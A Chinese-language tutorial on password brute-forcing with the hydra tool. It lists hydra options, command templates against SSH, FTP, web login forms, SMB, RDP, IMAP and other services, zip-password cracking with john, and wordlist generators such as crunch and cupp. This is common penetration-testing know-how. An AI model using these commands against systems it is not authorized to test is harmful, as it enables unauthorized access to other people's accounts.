hydra-字典暴力破解

0x00 暴力破解简介

暴力破解是指通过反复试错的方法来尝试破解密码或用户名。.
这是一种较老的攻击方法。在许多场景任然是比较好的方法，今天更新一篇关于字典以及暴力破解随笔

0x01 字典介绍

生成字典的方法以及工具都有很多，字典的高效在于字典所储存内容对即将要破解的对象的敏感性大不大，当然一个10T容量的字典，当然是储存的东西非常多无所不能，但是还是不太切换实际，更多需要高效性。字典网上有很多，也可以根据特点来生成相对应特征的字典提高破解效率，下面简单介绍一下字典以及工具。

0x02 爆破工具 kaili-hydra

1）kali爆破神器----hydra
这是一款强大的爆破工具，结合相关的字典可以发挥出高效的作用

参数：
-l：指定单个用户名，适合在知道用户名爆破用户名密码时使用
-L 指定多个用户名，参数值为存储用户名的文件的路径(建议为绝对路径)
-p 指定单个密码，适合在知道密码爆破用户名时使用
-P 指定多个密码，参数值为存贮密码的文件(通常称为字典)的路径(建议为绝对路径)
-C 当用户名和密码存储到一个文件时使用此参数，字典存储的格式必须为 “用户名:密码” 的格式。
-M 指定多个攻击目标，此参数为存储攻击目标的文件的路径(建议为绝对路径)。注意：列表文件存储格式必须为 “地址:端口”
-t 指定爆破时的任务数量(可以理解为线程数)，默认为16
-s 指定端口，适用于攻击目标端口非默认的情况。例如：http服务使用非80端口
-S 指定爆破时使用 SSL 链接
-R 继续从上一次爆破进度上继续爆破
-v/-V 显示爆破的详细信息
-f 一但爆破成功一个就停止爆破 server 代表要攻击的目标(单个)，多个目标时请使用

> payload：

1、破解ssh： hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra
-l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp： hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV hydra ip ftp -l
用户名 -P 密码字典 -e ns -vV

3、get方式提交，破解web登录： hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get
/admin/ hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get
/admin/index.php

4、post方式提交，破解web登录： hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form
“/admin/login.php:username=^USER&password=^PASS&submit=login:sorry
password” hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18
http-post-form “login.php:id=^USER&passwd=^PASS:wrong<br/> username or password”
（参数说明：-t同时线程数3，-l用户名是admin，字典pass.txt，保存为out.txt，-f 当破解了一个密码就停止，
10.36.16.18目标ip，http-post-form表示破解是采用http的post方式提交的表单密码破解,中的内容是表示错误猜解的返回信息提示。）

5、破解https： hydra -m /index.php -l muts -P pass.txt 1.1.1.1 https

6、破解teamspeak： hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

7、破解cisco： hydra -P pass.txt 1.1.1.1 cisco hydra -m cloud -P
pass.txt 1.1.1.1 cisco-enable

8、破解smb： hydra -l administrator -P pass.txt 1.1.1.1 smb

9、破解pop3： hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp： hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy： hydra -l admin -P pass.txt http-proxy://1.1.1.1

12、破解imap： hydra -L user.txt -p secret1.1.1.1 imap PLAIN hydra -C
defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

kali爆破压缩包密码: zip2john yasuobao.zip >> passwd.txt #生成压缩包hash john
passwd.txt #查看解密hash

0x03 字典生成工具

kali-crunch
根据密码特性生成对应字典
例：crunch 最小位最大位 -t 条件 %%%（数字） -o 输出位置
kali-cupp
cupp可交互式字典生成，可以根据相关的要求去制作一个相关内容格式的字典，制作特定字典提高破解效率

windows字典生成工具有很多这里我介绍一个交互式生成工具，或许有更好的工具供大家去使用

hydra-字典暴力破解相关推荐

Hydra（暴力破解）
Hydra(暴力破解) Hydra 暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,其密码能否被破解关键在于字典是否足够强大对于社会工程型渗透来说,有时能够得到事半功倍的效果.本文仅从安全角 ...
OSCP-课外1（http万能密码、hydra密码暴力破解http、代码审计、Win缓存区溢出）
目录难度主机发现&端口扫描信息收集万能密码 hydra密码暴力破解
使用Hydra批量暴力破解SSH、RDP登录口令
破解环境:Kali 2021.1 使用namp扫描SSH端口开放的主机 nmap -p 22 -n --open 192.168.1.0/24 | grep 192 |awk '{print $5}' ...
python生成字典暴力破解
目标:python生成一个字典来暴力破解这样,可爆破验证码等将print的int型转换成str型结果输出到文件中,比如文件在D:\out.txt: i = 100000 w = open('hell ...
Hydra（暴力破解工具）参数
参数详解: -R 根据上一次进度继续破解 -S 使用SSL协议连接 -s 指定端口 -l 指定用户名 -L 指定用户名字典(文件) -p 指定密码破解 -P 指定密码字典(文件) -e 空密码探测和指 ...
Wifi密码破解1：通过字典(暴力)破解WIFI密码
简单破解WEP/WPA/WPA2加密的WIFI密码,平台kali-linux 工具:Aircrack-ng 过程很简单:先抓含有正确密码的握手包(客户端连接wifi的时候会互相交换报文),然后从这个抓 ...
Kali渗透测试工具库（三）hydra——密码暴力破解工具
目录工具简介使用方法使用举例:暴破ssh登录密码环境介绍: 开始爆破测试登录
Hydra暴力破解工具的用法
目录 Hydra 常见参数破解SSH 破解FTP 破解HTTP 破解3389远程登录 Kali自带密码字典 dirb dirbuster fern-wifi metasploit wfuzz Hyd ...
暴力破解攻击工具汇总——字典很关键，肉鸡也关键
lasercrack是一款爆力破解工具,ruby写的,现如今市面上常见的暴力工具如hydra,medusa都有着不错的破解效率. 破解RDP的软件也有很多,比如ncrack和Fast RDP Brut ...
Kali 暴力破解--medusa/hydra/xhydra
目录 1 实战-使用 hydra 工具在线破解系统用户密码 2 实战-使用 Medusa 工具在线破解 3 实战-图形化暴力破解软件 xhydra 1 实战-使用 hydra 工具在线破解系统用户密码 ...